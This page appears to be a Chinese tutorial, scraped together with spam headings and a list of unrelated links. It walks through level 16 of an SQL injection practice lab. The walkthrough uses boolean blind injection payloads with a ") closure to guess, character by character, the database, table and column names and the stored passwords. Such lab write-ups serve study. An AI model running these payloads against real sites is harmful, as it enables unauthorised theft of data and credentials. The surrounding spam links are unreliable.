当前位置: 首页 > news >正文

网站建设项目设计表网站已有备案了 现在换空间商还用备案么

news 2026/4/14 4:09:45
网站建设项目设计表,网站已有备案了 现在换空间商还用备案么,长沙县不错的建站按效果付费,长春做网站文章目录 前言一、回顾上一关知识点二、靶场第十六关通关思路1、判断注入点2、猜数据库长度3、猜数据库名字4、猜表名长度5、猜表名名字6、猜列名长度7、猜列名名字8、猜数据长度9、猜数据名字 总结 前言 此文章只用于学习和反思巩固sql注入知识#xff0c;禁止用于做非法攻击… 文章目录 前言一、回顾上一关知识点二、靶场第十六关通关思路1、判断注入点2、猜数据库长度3、猜数据库名字4、猜表名长度5、猜表名名字6、猜列名长度7、猜列名名字8、猜数据长度9、猜数据名字 总结 前言 此文章只用于学习和反思巩固sql注入知识禁止用于做非法攻击。注意靶场是可以练习的平台不能随意去尚未授权的网站做渗透测试 一、回顾上一关知识点 上一关是典型的布尔盲注是单引号闭合。这一关是)闭合。 二、靶场第十六关通关思路 1、判断注入点2、猜数据库长度3、猜数据库名字4、猜表名长度5、猜表名名字6、猜列名长度7、猜列名名字8、猜数据长度9、猜数据名字 1、判断注入点 这一关和上一关唯一不同的就是闭合不同我们一个个试就行。一般都是单引号、双引号或者引号和括号混合。 注入语句为 1 or 11 1 or 12 发现没有反应再试试 1 or 11#1 or 12#经过不断尝试payload为 1) or 11#1) or 12#2、猜数据库长度 注入语句为 1) or length(database())7#发现数据库长度大于7页面登录成功大于8登录失败 3、猜数据库名字 注入语句为 1) or ascii(substr(database(),1,1))114#(如图所示)发现大于114正常大于115页面false状态。所以数据库名第一个字符ascii码为115通过ascii码查询发现是字符’s’。我们要重复此操作八次才能猜出数据库名方法和上面一样就是把substr(database(),2,1)一直递增到8最后得到数据库名为security 4、猜表名长度 注入语句为 1) or length((select table_name from information_schema.tables where table_schemadatabase() limit 0,1))5#发现第一个数据库表名大于5页面正常大于6页面false状态。(如图所示) 通过limit 0,1递增标注数字猜其他表名长度。 得到第一个表名长6第二个表名长8第三个表名长6第四个长度表名长5 5、猜表名名字 1) or ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1),1,1))116#(如图所示)发现第四个表名第一个字符ascii码大于116正常大于117页面false得到第四个表名第一个字符ascii码为117说明是字符’u’ 通过substr(表名,1,1)递增标注数字到5猜出此表名名字为users 6、猜列名长度 注入语句为 1) or (length((select column_name from information_schema.columns where table_schemadatabase() and table_nameuserslimit 0,1)))1#(如图所示)猜出第一个列名长度大于1页面正常大于2页面false所以第一个列名长2。以此类推递增limit得到所有列名长度(略)。第二个列名长8第三个列名长8。 7、猜列名名字 注入语句为 1) or ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 1,1),1,1))116# 猜到第二个列名第一个字符大于116正常大于117页面false。通过substr(列名,1,1) 和limit 0,1不断递增标识数字查出所有列名名字。这里只演示了一个列名。得到usernamepassword列名。 8、猜数据长度 注入语句为 1) or length((select password from users limit 0,1))3#(如图所示)猜出第一个密码长度大于3正常大于4页面false。以此类推查所有数据长度。方法和上面一样就不展示了 9、猜数据名字 注入语句为 1) or ascii(substr((select password from users limit 0,1),1,1))67#(如图所示)猜出密码第一个字符大于67正常大于68页面false。以此类推猜出所有数据名字。 总结 这一关和上一关差不多只是闭合方式不同。此文章是小白自己为了巩固sql注入而写的大佬路过请多指教
http://www.hkea.cn/news/14256345/

相关文章:

  • 网站 引导页 设计php网站微信登录怎么做
  • 做外账经常进哪几个网站东莞教育团购网站建设
  • h5页面制作网站免费拼多多搜索关键词排名
  • 网站建设公司哪里好网站上做地图手机上显示不出来的
  • 网站建设的技巧有哪些方面做画册的国外网站
  • 郑州做网站最好的公司5条国内最新新闻
  • 网站登录慢眼镜网站怎么做竞价
  • 高端网站建设与发展打开app登录
  • 网站运营的目的及意义龙华公司
  • 网站建设计划书模板百度区域代理
  • 公司网站必须做可信认证吗开发一个app要多少钱呢
  • dede网站 地图什么做做图素材网站 千
  • app公司网站建设桂林漓江景区
  • 网站建设需要学ps吗大连招标信息网
  • 上海网站建设价深圳机械网站建设
  • 如何建设一个好的企业网站涉县移动网站建设
  • react 做网站保健品网站源代码
  • gateface能用来做网站吗做专业网站设计多少钱
  • 广宁县住房建设局网站免费企业信息发布平台
  • 天津建设项目招投标网站做网站需要那些技术
  • 网站详情页怎么做微信公众号分销功能
  • 富通建设工程有限公司网站网站设计酷站
  • 手表网站建设规划书wordpress联系人表单
  • 东莞网站建设工作推广怎么推
  • 网页 制作网站佛山网站提升排名
  • 众意网站建设zyecnwordpress sina
  • 软考高级网络规划设计师seo排名规则
  • 整站关键词排名优化淘宝客wordpress模板
  • 昆山h5网站建设怎么做二维码转到网站
  • 合肥网站建设平台个人网站一定要备案吗